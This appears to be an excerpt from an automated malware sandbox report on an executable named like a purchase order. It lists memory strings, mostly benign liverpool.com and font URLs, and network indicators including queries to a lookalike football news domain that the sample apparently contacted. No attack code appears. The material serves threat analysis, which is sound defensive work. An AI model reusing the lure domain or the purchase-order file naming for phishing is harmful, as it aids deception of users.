          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
          Source: unknownDNS traffic detected: queries for: myliverpoolnews.cf
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 11:31:12 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
          Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
          Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf
          Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
          Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BreadcrumbList
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/ListItem
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/NewsArticle
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
          Source: PO45937008ADENGY.exe, 00000000.00000002.710098516.0000000002DF1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000D.00000003.684999902.00000000052E0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
          Source: explorer.exe, 0000000C.00000000.669438357.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: PO45937008ADENGY.exe, 00000000.00000002.710825651.0000000002E7F000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000C.00000000.697642864.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s615/0_GettyImages-1302496803.
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://mab.data.tm-awx.com/rhs&quot;
          Source: PO45937008ADENGY.exe, 00000000.00000002.710719071.0000000002E65000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf
          Source: PO45937008ADENGY.exe, 00000000.00000002.710719071.0000000002E65000.00000004.00000001.sdmpString found in binary or memory: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://reachplc.hub.loginradius.com&quot;
          Source: PO45937008ADENGY.exe, 00000000.00000002.710978301.0000000002E9B000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
          Source: PO45937008ADENGY.exe, 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.mirror.co.uk/
